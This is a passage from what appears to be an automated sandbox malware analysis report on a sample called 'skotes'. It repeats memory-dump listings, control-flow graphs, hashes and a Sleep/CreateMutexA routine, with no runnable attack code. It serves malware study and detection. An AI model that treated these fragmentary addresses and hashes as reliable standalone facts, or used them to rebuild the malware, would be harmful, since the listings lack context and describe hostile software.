                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183704714.0000000000E34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183718528.0000000000E3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183731288.0000000000E3C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183743704.0000000000E3E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183757632.0000000000E4C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183770268.0000000000E4E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183791695.0000000000E4F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183805801.0000000000E56000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183818899.0000000000E5D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183833396.0000000000E5F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183846914.0000000000E67000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183859103.0000000000E69000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183873159.0000000000E78000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183884988.0000000000E79000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183884988.0000000000EA9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183921886.0000000000EC3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183940513.0000000000EC4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183959130.0000000000EDA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183973738.0000000000EDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183986076.0000000000EDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2184002179.0000000000EE0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2184014073.0000000000EE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2184027530.0000000000EF0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2184061928.0000000000EF1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1464230837-0
                                                                                                                                                                                                                                              • Opcode ID: 8ecda06658a4d86996360fd6982093625b3939ca017ccf6fa711e8729279056a
                                                                                                                                                                                                                                              • Instruction ID: 3087c4b9d43dbaab77070d784ede209036888bdaae461e5477d2d28d2cb757fb
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8ecda06658a4d86996360fd6982093625b3939ca017ccf6fa711e8729279056a
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E6314A317102409BFB08DB78DCD979DF7E2EBC6310F24829AE014A73D5E77A99808762

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 90 bda1ae-bda1ce 94 bda1fc-bda218 90->94 95 bda1d0-bda1dc 90->95 96 bda21a-bda226 94->96 97 bda246-bda265 94->97 98 bda1de-bda1ec 95->98 99 bda1f2-bda1f9 call bed663 95->99 100 bda23c-bda243 call bed663 96->100 101 bda228-bda236 96->101 102 bda267-bda273 97->102 103 bda293-bda916 call be80c0 97->103 98->99 104 bda935 98->104 99->94 100->97 101->100 101->104 110 bda289-bda290 call bed663 102->110 111 bda275-bda283 102->111 107 bda953-bda994 Sleep CreateMutexA 104->107 108 bda935 call c06c6a 104->108 120 bda9a7-bda9a8 107->120 121 bda996-bda998 107->121 108->107 110->103 111->104 111->110 121->120 122 bda99a-bda9a5 121->122 122->120
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • Sleep.KERNELBASE(00000064), ref: 00BDA963
                                                                                                                                                                                                                                              • CreateMutexA.KERNELBASE(00000000,00000000,00C33254), ref: 00BDA981
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.2183253576.0000000000BD1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183241564.0000000000BD0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183253576.0000000000C32000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183298522.0000000000C39000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183323287.0000000000C3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183337101.0000000000C45000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183349265.0000000000C46000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183362592.0000000000C47000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183448160.0000000000DA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183462698.0000000000DA3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183480656.0000000000DBA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183493828.0000000000DBC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183506287.0000000000DBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183506287.0000000000DC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183532091.0000000000DCD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183543836.0000000000DCF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183557679.0000000000DDB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183570847.0000000000DE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183588010.0000000000DF4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183601098.0000000000DF5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183613091.0000000000DF6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183637557.0000000000E09000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183655100.0000000000E21000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183666981.0000000000E22000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183679723.0000000000E2A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183691415.0000000000E2B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183704714.0000000000E34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183718528.0000000000E3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183731288.0000000000E3C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183743704.0000000000E3E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183757632.0000000000E4C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183770268.0000000000E4E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183791695.0000000000E4F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183805801.0000000000E56000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183818899.0000000000E5D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183833396.0000000000E5F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183846914.0000000000E67000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183859103.0000000000E69000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183873159.0000000000E78000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183884988.0000000000E79000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183884988.0000000000EA9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183921886.0000000000EC3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183940513.0000000000EC4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183959130.0000000000EDA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183973738.0000000000EDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183986076.0000000000EDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2184002179.0000000000EE0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2184014073.0000000000EE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2184027530.0000000000EF0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2184061928.0000000000EF1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1464230837-0
                                                                                                                                                                                                                                              • Opcode ID: d8f23f7dc6c422df9c3cf65bf7bee8e6ad777ad5396903e034dd497463180b4d
                                                                                                                                                                                                                                              • Instruction ID: 56a00a7195dc4320a8588fa1dfa75527c8866bef6d92cf68dad7f37d3407674b
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d8f23f7dc6c422df9c3cf65bf7bee8e6ad777ad5396903e034dd497463180b4d
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3F312A317002409FFB089B78DCD979DF7E2EBD6310F24829AE014A73D5E77A99808752

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 124 bda418-bda438 128 bda43a-bda446 124->128 129 bda466-bda482 124->129 132 bda45c-bda463 call bed663 128->132 133 bda448-bda456 128->133 130 bda484-bda490 129->130 131 bda4b0-bda4cf 129->131 136 bda4a6-bda4ad call bed663 130->136 137 bda492-bda4a0 130->137 138 bda4fd-bda916 call be80c0 131->138 139 bda4d1-bda4dd 131->139 132->129 133->132 134 bda93f-bda949 call c06c6a * 2 133->134 155 bda94e 134->155 156 bda949 call c06c6a 134->156 136->131 137->134 137->136 144 bda4df-bda4ed 139->144 145 bda4f3-bda4fa call bed663 139->145 144->134 144->145 145->138 157 bda953-bda994 Sleep CreateMutexA 155->157 158 bda94e call c06c6a 155->158 156->155 160 bda9a7-bda9a8 157->160 161 bda996-bda998 157->161 158->157 161->160 162 bda99a-bda9a5 161->162 162->160
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • Sleep.KERNELBASE(00000064), ref: 00BDA963
                                                                                                                                                                                                                                              • CreateMutexA.KERNELBASE(00000000,00000000,00C33254), ref: 00BDA981
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.2183253576.0000000000BD1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183241564.0000000000BD0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183253576.0000000000C32000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183298522.0000000000C39000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183323287.0000000000C3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183337101.0000000000C45000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183349265.0000000000C46000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183362592.0000000000C47000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183448160.0000000000DA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183462698.0000000000DA3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183480656.0000000000DBA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183493828.0000000000DBC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183506287.0000000000DBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183506287.0000000000DC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183532091.0000000000DCD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183543836.0000000000DCF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183557679.0000000000DDB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183570847.0000000000DE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183588010.0000000000DF4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183601098.0000000000DF5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183613091.0000000000DF6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183637557.0000000000E09000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183655100.0000000000E21000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183666981.0000000000E22000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183679723.0000000000E2A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183691415.0000000000E2B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183704714.0000000000E34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183718528.0000000000E3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183731288.0000000000E3C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183743704.0000000000E3E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183757632.0000000000E4C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183770268.0000000000E4E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183791695.0000000000E4F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183805801.0000000000E56000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183818899.0000000000E5D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183833396.0000000000E5F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183846914.0000000000E67000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183859103.0000000000E69000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183873159.0000000000E78000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183884988.0000000000E79000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183884988.0000000000EA9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183921886.0000000000EC3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183940513.0000000000EC4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183959130.0000000000EDA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183973738.0000000000EDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183986076.0000000000EDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2184002179.0000000000EE0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2184014073.0000000000EE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2184027530.0000000000EF0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2184061928.0000000000EF1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1464230837-0
                                                                                                                                                                                                                                              • Opcode ID: d922327f0764ea2c9ada40a33fe12bb2b1f4b00aeeaf9308834e2405a480ea46
                                                                                                                                                                                                                                              • Instruction ID: d9ece161adfe65b4bb9f8271ae3262b0940c77af34c0c84e1045d21bbd77f5fe
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d922327f0764ea2c9ada40a33fe12bb2b1f4b00aeeaf9308834e2405a480ea46
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D3314A317001409BFB08AB78D8DD7ADF7E1EFD6314F20829AE014973D5E7B999808A66

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 164 bda54d-bda56d 168 bda56f-bda57b 164->168 169 bda59b-bda5b7 164->169 170 bda57d-bda58b 168->170 171 bda591-bda598 call bed663 168->171 172 bda5b9-bda5c5 169->172 173 bda5e5-bda604 169->173 170->171 174 bda944-bda949 call c06c6a 170->174 171->169 176 bda5db-bda5e2 call bed663 172->176 177 bda5c7-bda5d5 172->177 178 bda606-bda612 173->178 179 bda632-bda916 call be80c0 173->179 191 bda94e 174->191 192 bda949 call c06c6a 174->192 176->173 177->174 177->176 184 bda628-bda62f call bed663 178->184 185 bda614-bda622 178->185 184->179 185->174 185->184 195 bda953-bda994 Sleep CreateMutexA 191->195 196 bda94e call c06c6a 191->196 192->191 198 bda9a7-bda9a8 195->198 199 bda996-bda998 195->199 196->195 199->198 200 bda99a-bda9a5 199->200 200->198
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • Sleep.KERNELBASE(00000064), ref: 00BDA963
                                                                                                                                                                                                                                              • CreateMutexA.KERNELBASE(00000000,00000000,00C33254), ref: 00BDA981
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.2183253576.0000000000BD1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183241564.0000000000BD0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183253576.0000000000C32000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183298522.0000000000C39000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183323287.0000000000C3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183337101.0000000000C45000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183349265.0000000000C46000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183362592.0000000000C47000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183448160.0000000000DA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183462698.0000000000DA3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183480656.0000000000DBA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183493828.0000000000DBC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183506287.0000000000DBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183506287.0000000000DC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183532091.0000000000DCD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183543836.0000000000DCF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183557679.0000000000DDB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183570847.0000000000DE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183588010.0000000000DF4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183601098.0000000000DF5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183613091.0000000000DF6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183637557.0000000000E09000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183655100.0000000000E21000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183666981.0000000000E22000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183679723.0000000000E2A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183691415.0000000000E2B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183704714.0000000000E34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183718528.0000000000E3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183731288.0000000000E3C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183743704.0000000000E3E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183757632.0000000000E4C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183770268.0000000000E4E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183791695.0000000000E4F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183805801.0000000000E56000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183818899.0000000000E5D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183833396.0000000000E5F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183846914.0000000000E67000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183859103.0000000000E69000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183873159.0000000000E78000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183884988.0000000000E79000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183884988.0000000000EA9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183921886.0000000000EC3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183940513.0000000000EC4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183959130.0000000000EDA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183973738.0000000000EDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183986076.0000000000EDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2184002179.0000000000EE0000.00000040.00000001.01000000.00000008.sdmpDownload File
